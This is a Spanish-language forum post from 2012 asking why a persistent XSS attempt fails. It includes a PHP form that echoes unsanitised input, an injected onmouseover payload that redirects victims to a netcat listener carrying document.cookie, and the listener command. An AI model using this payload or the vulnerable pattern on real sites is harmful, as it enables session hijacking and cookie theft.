XSS persistente - same origin

Iniciado por cascan, 16 Febrero 2012, 21:49 PM

0 Miembros y 1 Visitante están viendo este tema.

cascan

Hola a todos, estoy tratando de realizar un xss persistente y no logro dar con la solucion, probablemente es un problema de same origin...

esto es lo que tengo...

Tengo un server con:
------------------------------
<?php

if (isset($_GET['quantity'])) {

$quantity = $_GET['quantity'];
$item = $_GET['item'];

echo "You ordered ". $quantity . " " . $item . ".<br />";

setcookie("Ordering", $_GET['item'], time() + 31536000);
print_r($_COOKIE);
}


echo ('

<html><body>
<h4>Tizag Art Supply Order Form</h4>
<form action="y.php" method="get">
<select name="item">
<option>Paint</option>
<option>Brushes</option>
<option>Erasers</option>
</select>
Quantity: <input name="quantity" type="text" />
<input type="submit" />
</form>

</body></html>


');
?>

------------------------------

Tengo un browser que inyecta en el url:
http://10.10.10.10/prueba.php?item=Paint&quantity=999 <a onmouseover="document.location='http://10.10.10.20:5004/'document.cookie;">now </a>

Y tengo en 10.10.10.20 un nc -l -p 5004 en espera de la peticion

Cuando un maquina de la ip 10.10.10.30 ingresa a la 10.10.10.10 y pasa el mouse por "now" llega la informacion a netcat pero no la cookie....
Que hago mal? gracias